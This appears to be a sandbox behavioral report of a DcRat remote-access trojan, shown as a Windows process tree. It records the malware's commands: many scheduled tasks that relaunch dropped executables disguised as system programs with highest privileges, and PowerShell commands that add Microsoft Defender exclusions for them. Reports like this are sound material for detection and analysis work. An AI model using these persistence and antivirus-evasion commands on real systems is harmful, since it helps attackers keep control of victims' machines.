                                                                                                                                    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3104
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:3056
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 5 /tr "'C:\mswebFonthost\browserwinsvc.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:800
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "browserwinsvc" /sc ONLOGON /tr "'C:\mswebFonthost\browserwinsvc.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:2984
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 10 /tr "'C:\mswebFonthost\browserwinsvc.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3192
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\wscript.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:5060
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\mswebFonthost\wscript.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4464
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\wscript.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3116
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\fontdrvhost.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4792
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\mswebFonthost\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1068
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\SearchApp.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4320
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\mswebFonthost\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4960
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:2784
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Local\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1552
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "MsPortserverM" /sc MINUTE /mo 9 /tr "'C:\providerWebFont\MsPortserver.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3060
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "MsPortserver" /sc ONLOGON /tr "'C:\providerWebFont\MsPortserver.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3880
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "MsPortserverM" /sc MINUTE /mo 5 /tr "'C:\providerWebFont\MsPortserver.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3196
                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:3904
                                                                                                                                    • C:\Windows\regedit.exe
                                                                                                                                      "C:\Windows\regedit.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      • Runs regedit.exe
                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                      PID:4536
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:2972
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3332
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4516
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "NeoN" /sc MINUTE /mo 11 /tr "'C:\mswebFonthost\Neo.exe'" /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4864
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "Neo" /sc ONLOGON /tr "'C:\mswebFonthost\Neo.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3664
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks.exe /create /tn "NeoN" /sc MINUTE /mo 13 /tr "'C:\mswebFonthost\Neo.exe'" /rl HIGHEST /f
                                                                                                                                    1⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:728
                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:620
                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:4068
                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:1988
                                                                                                                                        • C:\Windows\system32\perfmon.exe
                                                                                                                                          "C:\Windows\system32\perfmon.exe" /res
                                                                                                                                          1⤵
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                          PID:216
                                                                                                                                        • C:\Windows\appcompat\Programs\RuntimeBroker.exe
                                                                                                                                          C:\Windows\appcompat\Programs\RuntimeBroker.exe
                                                                                                                                          1⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4216
                                                                                                                                          • C:\Users\Admin\AppData\Local\SearchApp.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\SearchApp.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:2608
                                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:1516
                                                                                                                                            • C:\Users\Admin\AppData\Local\SearchApp.exe.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\SearchApp.exe.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5012
                                                                                                                                          • C:\Windows\appcompat\Programs\RuntimeBroker.exe.exe
                                                                                                                                            "C:\Windows\appcompat\Programs\RuntimeBroker.exe.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Modifies WinLogon for persistence
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Adds Run key to start application
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            PID:4948
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\Programs\RuntimeBroker.exe.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:4920
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providerWebFont\services.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:4996
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:2360
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\unsecapp.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:1444
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\csrss.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:808
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\WindowsUpdate\smss.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:636
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:4100
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SolaraTab\msedge.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:2612
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Desktop\Idle.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:1148
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Local Settings\WaveInstaller.exe'
                                                                                                                                              3⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:4840
                                                                                                                                            • C:\mswebFonthost\csrss.exe
                                                                                                                                              "C:\mswebFonthost\csrss.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                              PID:2904
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\providerWebFont\services.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2208
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\providerWebFont\services.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4920
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\providerWebFont\services.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1724
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1444
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4868
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\explorer.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:808
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\unsecapp.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:976
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\unsecapp.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2792
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\unsecapp.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1948
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\mswebFonthost\csrss.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1712
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\mswebFonthost\csrss.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:3164
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\mswebFonthost\csrss.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4432
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\Logs\WindowsUpdate\smss.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4168
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Logs\WindowsUpdate\smss.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          PID:1148
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Windows\Logs\WindowsUpdate\smss.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4560
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1860
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "WaveInstaller" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2784
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\WaveInstaller.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4876
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\SolaraTab\msedge.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:180
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\SolaraTab\msedge.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:3160
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\SolaraTab\msedge.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1892
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Desktop\Idle.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1552
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\Desktop\Idle.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:448
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Desktop\Idle.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4608
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Local Settings\WaveInstaller.exe'" /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2128
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "WaveInstaller" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\WaveInstaller.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2608
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /create /tn "WaveInstallerW" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Local Settings\WaveInstaller.exe'" /rl HIGHEST /f
                                                                                                                                          1⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:4204
                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x49c 0x480
                                                                                                                                          1⤵
                                                                                                                                            PID:5836
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_processhacker-2.39-bin.zip\x64\ProcessHacker.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp1_processhacker-2.39-bin.zip\x64\ProcessHacker.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                            PID:4608
                                                                                                                                          • C:\Users\Admin\AppData\Local\SearchApp.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\SearchApp.exe
                                                                                                                                            1⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3204
                                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5428
                                                                                                                                            • C:\Users\Admin\AppData\Local\SearchApp.exe.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\SearchApp.exe.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5464
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                                            1⤵
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                            PID:3632
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffee8fc46f8,0x7ffee8fc4708,0x7ffee8fc4718
                                                                                                                                              2⤵
                                                                                                                                                PID:1136
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                                                                                                                                                2⤵
                                                                                                                                                  PID:2960
